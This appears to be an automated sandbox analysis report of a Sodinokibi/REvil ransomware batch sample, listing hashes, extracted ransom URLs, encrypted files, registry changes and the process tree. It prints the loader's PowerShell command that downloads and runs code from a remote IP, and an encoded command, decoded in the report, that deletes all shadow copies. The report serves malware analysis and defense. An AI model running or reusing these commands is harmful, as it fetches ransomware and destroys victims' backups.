Analysis
- max time kernel: 38s
- max time network: 37s
- platform: windows7_x64
- resource: win7v200430
- submitted: 07-06-2020 11:10
- Static task: static1
- Behavioral task: behavioral1 (Sample: 0c8fe037f03d1ce50314d43d98fbb194.bat, Resource: win7v200430)
- Behavioral task: behavioral2 (Sample: 0c8fe037f03d1ce50314d43d98fbb194.bat, Resource: win10v200430)
General
- Target: 0c8fe037f03d1ce50314d43d98fbb194.bat
- Size: 219B
- MD5: 7ade68e5f45f65e5f0d80987ec07fe12
- SHA1: ad4667dfd46bd31108df3355378d115891af37b4
- SHA256: bb6e5707ed0e890b78840f7baf4ddc06662c752d1db3c0b7f510db84c544a44f
- SHA512: 24c287f1306c94c85824f19d7285525afc0dad378975bbf1b92fd4b6217cfb3f33f0c2f98634cc8b2d9a65af5fbd8ad3cc1ddfcec1af86a97bfdf3d84f6f0a7a
Malware Config
- Extracted: http://185.103.242.78/pastes/0c8fe037f03d1ce50314d43d98fbb194
- Extracted: C:\a718494f64-readme.txt
  - sodinokibi
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E93CD2D66E9B0E2E
  - http://decryptor.cc/E93CD2D66E9B0E2E
Signatures
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes (distinct pid/process pairs):
  - pid 1012: powershell.exe
  - pid 1552: powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes:
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Drops file in Program Files directory (34 IoCs)
  Processes:
  - File opened for modification: \??\c:\program files\OptimizeNew.wvx (powershell.exe)
  - File opened for modification: \??\c:\program files\ResumeMount.ogg (powershell.exe)
  - File opened for modification: \??\c:\program files\UnlockUndo.mpeg2 (powershell.exe)
  - File opened for modification: \??\c:\program files\UnprotectEnable.png (powershell.exe)
  - File opened for modification: \??\c:\program files\UnregisterWait.docx (powershell.exe)
  - File created: \??\c:\program files\a718494f64-readme.txt (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\a718494f64-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\SendSubmit.avi (powershell.exe)
  - File opened for modification: \??\c:\program files\RestoreTest.temp (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\a718494f64-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\PingStep.ini (powershell.exe)
  - File opened for modification: \??\c:\program files\ProtectRename.xps (powershell.exe)
  - File opened for modification: \??\c:\program files\RestoreDebug.ogg (powershell.exe)
  - File created: \??\c:\program files (x86)\a718494f64-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\ConfirmResize.mpv2 (powershell.exe)
  - File opened for modification: \??\c:\program files\MeasureEnter.mov (powershell.exe)
  - File opened for modification: \??\c:\program files\SearchTrace.midi (powershell.exe)
  - File opened for modification: \??\c:\program files\SwitchGet.crw (powershell.exe)
  - File opened for modification: \??\c:\program files\AddDeny.xps (powershell.exe)
  - File opened for modification: \??\c:\program files\HideSend.xht (powershell.exe)
  - File opened for modification: \??\c:\program files\InstallClear.xls (powershell.exe)
  - File opened for modification: \??\c:\program files\TraceUpdate.emf (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\a718494f64-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\ApproveSwitch.wm (powershell.exe)
  - File opened for modification: \??\c:\program files\ConnectWatch.mpeg3 (powershell.exe)
  - File opened for modification: \??\c:\program files\RestoreRequest.rar (powershell.exe)
  - File opened for modification: \??\c:\program files\SkipDisable.M2T (powershell.exe)
  - File opened for modification: \??\c:\program files\BlockReset.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\InvokeApprove.png (powershell.exe)
  - File opened for modification: \??\c:\program files\ReadDeny.rm (powershell.exe)
  - File opened for modification: \??\c:\program files\TraceRepair.otf (powershell.exe)
  - File opened for modification: \??\c:\program files\CloseOpen.m3u (powershell.exe)
  - File opened for modification: \??\c:\program files\ConvertRevoke.MTS (powershell.exe)
  - File opened for modification: \??\c:\program files\DisableJoin.html (powershell.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes:
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z6bh422b7ed5g.bmp" (powershell.exe)
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
  - pid 1012: powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes:
  - PID 1512 wrote to memory of 1012: cmd.exe (1512) -> powershell.exe
  - PID 1012 wrote to memory of 1552: powershell.exe (1012) -> powershell.exe
  - PID 1012 wrote to memory of 1552: powershell.exe (1012) -> powershell.exe
  - PID 1012 wrote to memory of 1552: powershell.exe (1012) -> powershell.exe
  - PID 1012 wrote to memory of 1552: powershell.exe (1012) -> powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes:
  - Token: SeDebugPrivilege (pid 1012, powershell.exe)
  - Token: SeDebugPrivilege (pid 1012, powershell.exe)
  - Token: SeDebugPrivilege (pid 1552, powershell.exe)
  - Token: SeBackupPrivilege (pid 1764, vssvc.exe)
  - Token: SeRestorePrivilege (pid 1764, vssvc.exe)
  - Token: SeAuditPrivilege (pid 1764, vssvc.exe)
  - Token: SeTakeOwnershipPrivilege (pid 1012, powershell.exe)
- Blacklisted process makes network request (1 IoCs)
  Processes:
  - flow 3, pid 1012: powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\0c8fe037f03d1ce50314d43d98fbb194.bat"
  PID: 1512
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0c8fe037f03d1ce50314d43d98fbb194');Invoke-NIZOHWYRLEXH;Start-Sleep -s 10000"
    PID: 1012
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of UTF-16LE text and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      PID: 1552
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  PID: 1764
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken